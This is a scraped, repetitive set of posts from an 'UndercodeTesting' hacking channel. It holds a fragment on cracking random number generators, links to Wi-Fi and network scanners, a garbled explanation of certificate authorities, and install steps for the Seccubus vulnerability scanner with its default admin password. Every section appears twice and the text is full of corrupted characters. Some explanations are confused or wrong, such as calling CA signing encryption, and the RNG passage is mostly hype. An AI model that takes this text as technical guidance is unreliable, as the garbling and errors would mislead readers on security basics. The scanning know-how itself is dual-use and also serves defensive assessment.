2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
iStumbler Labs
Handcrafted Tools for Better Computing
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is CA/PEM/DER/X509/PKCS Encryption ?
> The general public key will not be transmitted to others in plain text
> . Under normal circumstances, a file will be generated.
> This file is the public key file. Then this file can be handed over to others for encryption, but if someone maliciously destroys it during the transmission process, it will be Your public key is replaced with his public key, and then the party who gets the public key encrypts the data.
> Can't he use his own key to decrypt and see the data? In order to solve this problem, a notary party is needed to do this Anyone can find it to confirm who sent the public key.
> This is the CA. The principle of the CA confirming the public key is also very simple. It publishes its own public key to everyone, and then one wants to publish its own public key.
> The key holder can send his public key and some identity information to the CA, and the CA encrypts it with its own key, which can also be called a signature here. Then this file containing your public key and your information can be called It is a certificate file. In this way, all people who have obtained some public key files decrypt the files through the public key of the CA.
> If they are decrypted normally, the information in the secret must be true, because the encryption party can only be the CA, and others There is no key. Then you can unlock the public key file and look at the information inside to know if this is the public key you need to encrypt.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is CA/PEM/DER/X509/PKCS Encryption ?
> The general public key will not be transmitted to others in plain text
> . Under normal circumstances, a file will be generated.
> This file is the public key file. Then this file can be handed over to others for encryption, but if someone maliciously destroys it during the transmission process, it will be Your public key is replaced with his public key, and then the party who gets the public key encrypts the data.
> Can't he use his own key to decrypt and see the data? In order to solve this problem, a notary party is needed to do this Anyone can find it to confirm who sent the public key.
> This is the CA. The principle of the CA confirming the public key is also very simple. It publishes its own public key to everyone, and then one wants to publish its own public key.
> The key holder can send his public key and some identity information to the CA, and the CA encrypts it with its own key, which can also be called a signature here. Then this file containing your public key and your information can be called It is a certificate file. In this way, all people who have obtained some public key files decrypt the files through the public key of the CA.
> If they are decrypted normally, the information in the secret must be true, because the encryption party can only be the CA, and others There is no key. Then you can unlock the public key file and look at the information inside to know if this is the public key you need to encrypt.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
seccubus.png
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦πβοΈ Seccubus - Simple automated scanning, reporting and
vulnerability analysis :
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues. Non issues get ignored until they change. This causes a dramatic reduction in analysis time. Before the results of a vulnerability scan are imported into Seccubus they are first converted to the Intermediate Vulnerability Information Language (IVIL) format to make sure Seccubus can work with many different scanners
F E A T U R E S :
Nessus
OpenVAS
Skipfish
Medusa (local and remote)
Nikto (local and remote)
NMap (local and remote)
OWASP-ZAP (local and remote)
SSLyze
Medusa
Qualys SSL labs
testssl.sh (local and remote)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget https://github.com/schubergphilis/Seccubus_v2/releases/download/x/seccubus_x.Bx_all.deb
2) sudo apt-get update
3) sudo dpkg -i seccubus_2.32.143-0_amd64.deb # This will fail
4) sudo apt-get -f install # This will install failed dependancies
5) Update the configuration file in /etc/seccubus/config.xml
6) Reload the seccubus service if you changed the config.
service seccubus reload
7) After installation, the default username and password for seccubus is:
admin / GiveMeVulns!
8) It is highly recommended to change it after installation.
/bin/seccubus_passwd -u admin
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦πβοΈ Seccubus - Simple automated scanning, reporting and
vulnerability analysis :
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues. Non issues get ignored until they change. This causes a dramatic reduction in analysis time. Before the results of a vulnerability scan are imported into Seccubus they are first converted to the Intermediate Vulnerability Information Language (IVIL) format to make sure Seccubus can work with many different scanners
F E A T U R E S :
Nessus
OpenVAS
Skipfish
Medusa (local and remote)
Nikto (local and remote)
NMap (local and remote)
OWASP-ZAP (local and remote)
SSLyze
Medusa
Qualys SSL labs
testssl.sh (local and remote)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget https://github.com/schubergphilis/Seccubus_v2/releases/download/x/seccubus_x.Bx_all.deb
2) sudo apt-get update
3) sudo dpkg -i seccubus_2.32.143-0_amd64.deb # This will fail
4) sudo apt-get -f install # This will install failed dependancies
5) Update the configuration file in /etc/seccubus/config.xml
6) Reload the seccubus service if you changed the config.
service seccubus reload
7) After installation, the default username and password for seccubus is:
admin / GiveMeVulns!
8) It is highly recommended to change it after installation.
/bin/seccubus_passwd -u admin
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β